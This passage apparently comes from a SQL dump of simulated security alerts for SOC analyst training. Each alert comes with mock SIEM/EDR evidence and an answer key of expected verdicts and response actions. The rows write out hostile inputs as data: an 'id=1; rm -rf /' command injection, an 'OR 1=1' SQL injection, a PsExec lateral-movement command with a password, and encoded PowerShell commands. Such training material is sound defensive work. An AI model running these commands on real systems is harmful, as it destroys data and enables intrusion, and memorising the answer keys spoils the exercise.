'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.120Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T13:15:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.3.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"admin-workstation\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand QABkAG0AaQBuAC0AdAByAGEAcwBrACAAdQBwAGQAYQB0AGUAIABzAHkAcwB0AGUAbQAgAHMAdAByAGUAYQBtAHM=\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1740, 'Unusual PowerShell Script Execution', 'medium', 'CrowdStrike', 'A PowerShell script executed with encoded commands, but matches known IT maintenance patterns.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:40:05Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.4.30\",\"dst_ip\":\"\",\"username\":\"it_support\",\"hostname\":\"it-workstation\",\"command_line\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaQBuAHYAbwBrAGUAIABzAHkAcwB0AGUAbQAgAHUAcABkAGEAdABlACIA\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UwBFAFgAIAAtAE4AbwBwAG8AbwAgACIAaQBuAHYAbwBrAGUAIABzAHkAcwB0AGUAbQAgAHUAcABkAGEAdABlACIA\",\"is_critical\":false,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Matches known IT maintenance scripts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.4.30\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP belongs to IT support workstation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command was part of a scheduled IT maintenance task.\"}', 'Intermediate', 'EDR', 5, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc 
AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1741, 'Potential Malware Command Execution via PowerShell', 'high', 'SentinelOne', 'PowerShell executed a suspicious encoded command that may be indicative of malware activity.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T15:10:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.55\",\"dst_ip\":\"\",\"username\":\"dlee\",\"hostname\":\"workstation-55\",\"command_line\":\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\"}', '2026-03-15 19:50:15', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command linked to known malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address, potential victim of malware attack\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The execution of a suspicious encoded PowerShell script suggests malware involvement.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. 
Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.126Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T15:10:20Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"dlee\\\",\\\"hostname\\\":\\\"workstation-55\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand VwBFAFcAIAAtAE4AbwBwAG8AbwAgACIAaAB0AHQAcAA6AC8ALwBtAGEAbAB3AGEAcgBlAC4AYwBvAG0AIgA=\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1742, 'APT41 Lateral Movement Detected via PSExec', 'critical', 'ThreatConnect', 'Suspicious PSExec execution detected from an internal IP, mimicking APT41 techniques. Internal lateral movement observed.', 'Lateral Movement', 'T1569', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T03:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.100.23\",\"dst_ip\":\"192.168.100.45\",\"username\":\"domain\\\\admin_user\",\"hostname\":\"CORP-SERVER-01\",\"command_line\":\"psexec \\\\\\\\192.168.100.45 -u domain\\\\admin_user -p Password123 cmd.exe\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.100.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Target internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"psexec \\\\\\\\192.168.100.45 -u domain\\\\admin_user -p Password123 cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"PSExec command indicative of lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PSExec is commonly used for lateral movement by APT41, indicating a potential breach.\"}', 'Advanced', 'TI', 7, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.139Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T03:45:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.100.23\\\",\\\"dst_ip\\\":\\\"192.168.100.45\\\",\\\"username\\\":\\\"domain\\\\\\\\admin_user\\\",\\\"hostname\\\":\\\"CORP-SERVER-01\\\",\\\"command_line\\\":\\\"psexec \\\\\\\\\\\\\\\\192.168.100.45 -u domain\\\\\\\\admin_user -p Password123 cmd.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1743, 'Lazarus Group Phishing Attempt with Malicious URL', 'high', 'MISP', 'Phishing email from a known Lazarus Group domain containing a malicious URL targeting internal users.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.200.15\",\"email_sender\":\"alert@secure-mail.com\",\"username\":\"john.doe@company.com\",\"hostname\":\"MAIL-SERVER-01\",\"url\":\"http://malicious-site.com/login\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"alert@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain mimics legitimate services\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL identified as phishing site\"}}],\"expected_actions\":[\"block_ip\",\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Email with malicious URL targeting users, typical tactic of Lazarus Group.\"}', 'Advanced', 'TI', 7, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event 
detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.141Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.200.15\\\",\\\"email_sender\\\":\\\"alert@secure-mail.com\\\",\\\"username\\\":\\\"john.doe@company.com\\\",\\\"hostname\\\":\\\"MAIL-SERVER-01\\\",\\\"url\\\":\\\"http://malicious-site.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1744, 'Fancy Bear Command Injection via Web Application', 'critical', 'Recorded Future', 'Detected command injection attempt from external IP using vulnerable web application endpoint.', 'Web Attack', 'T1190', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T09:15:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.25\",\"dst_ip\":\"192.168.250.10\",\"hostname\":\"WEB-SERVER-01\",\"request_body\":\"id=1; rm -rf /\",\"url\":\"http://target-site.com/vulnerable-endpoint\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple web-based attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://target-site.com/vulnerable-endpoint\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"Endpoint known to be vulnerable\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"id=1; rm -rf /\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"Command injection attempt to compromise web server, typical Fancy Bear tactic.\"}', 'Advanced', 'TI', 7, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 
203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.149Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T09:15:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"198.51.100.25\\\",\\\"dst_ip\\\":\\\"192.168.250.10\\\",\\\"hostname\\\":\\\"WEB-SERVER-01\\\",\\\"request_body\\\":\\\"id=1; rm -rf /\\\",\\\"url\\\":\\\"http://target-site.com/vulnerable-endpoint\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1745, 'Cozy Bear Credential Harvesting via Spear-Phishing', 'high', 'Anomali', 'Spear-phishing email detected with a link to a credential harvesting site impersonating internal IT department.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"192.168.1.30\",\"email_sender\":\"it-support@company-fake.com\",\"username\":\"alice.smith@company.com\",\"hostname\":\"MAIL-SERVER-02\",\"url\":\"https://fake-it-support.com/login\"}', '2026-03-15 19:52:44', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP known for phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"it-support@company-fake.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain closely resembles legitimate company domain\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://fake-it-support.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL hosts a credential harvesting 